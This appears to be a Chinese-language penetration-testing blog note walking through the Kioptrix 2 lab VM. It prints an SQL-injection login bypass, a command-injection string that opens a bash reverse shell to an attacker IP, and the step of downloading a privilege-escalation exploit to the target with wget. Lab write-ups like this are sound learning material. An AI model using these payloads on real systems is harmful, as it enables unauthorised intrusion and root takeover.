skyler实战渗透笔记:
笔记是为了记录实战渗透学习过程,分享渗透过程思路与方法。
请注意:
对于所有笔记中复现的终端或服务器,都是自行搭建环境或已获授权渗透的。使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.
困难:easy
首先同样的毛病,C段扫不到机器,还是跟上一篇一样的处理方法。
拿到IP后,先端口扫下:
访问下80端口,发现是个登录页面
登录页下意识就先考虑SQL注入。
这边有几种方法,首先可以尝试手工注入,直接用Administrator' or 1 #就进来了。
第二就是使用burpsuite,尝试将所有的sql万能密码通过intruder爆破试试,也能爆破出来
第三种就是直接用sqlmap跑出来。
进来后发现是个命令执行的对话框,考虑直接使用命令执行漏洞:
试了下,ls命令能够直接执行,不用拼接:
那么直接bash反弹出一个shell来:
127.0.0.1; bash -i >& /dev/tcp/192.168.232.129/8888 0>&1
在攻击机器上开启监听
成功获取到反弹shell
查看当前权限:
查看基本信息:
发现是CentOS 4.5,搜索一下4.5的漏洞,发现有一个提权漏洞:
直接下载攻击脚本到远程靶机上
python -m http.server 9999开启服务器,远端wget下载
直接编译,赋权限后执行,成功提权。
0x03 思路整理
本次渗透依然比较简单,就是通过sql注入获取到命令执行环境,然后反弹bash,搜索漏洞提权。其中sqlmap第一次默认参数跑不出来,建议增加risk和levle。
标签:Kioptrix,shell,skyler,渗透,笔记,提权,bash From: https://www.cnblogs.com/Shepherdzhao/p/16799756.html